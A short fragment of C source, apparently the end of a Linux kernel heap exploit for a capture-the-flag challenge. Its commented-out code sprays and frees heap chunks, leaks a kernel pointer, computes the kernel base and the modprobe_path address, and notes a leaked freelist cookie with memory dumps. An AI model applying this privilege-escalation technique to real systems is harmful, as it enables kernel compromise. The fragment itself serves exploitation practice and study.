    // for(int i = 0;i < 100;i++){
    // add(0,tmp,0x60);
    // gift(chunkList);
    // printf("[+] chunk[0]:0x%llx\n",(size_t *)chunkList[0]);
    // if(chunkList[0] == chunk1){
    // puts("[+] Find chunk[1]");
    // add(8,tmp,0x60);
    // size_t kernel_base = chunkList[7]-0x15bef20;
    // size_t modprobe_path = kernel_base + MOD_PROBE;
    // printf("MOD_PROBE_ADDR: 0x%llx\n",modprobe_path);
    // break;
    // }
    // else{
    // del(0);
    // }
    // }
    /*for(int i = 0;i<0xf;i++){
    printf("chunk[%d]:0x%llx\n",i,(size_t *)chunkList[i]);
    }*/
    //cookie = 0x8d27a11ecb38f824
}
/*
0xffff8800030d04e0: 0x8d27a11ecb38fb44 0x6161616161616161
0xffff8800030d0000: 0x8d27a11ecb38fcc4 0x6161616161616161
0xffff8800030d0d80: 0x8d27a11ecb38f5a4 0x6161616161616161
*/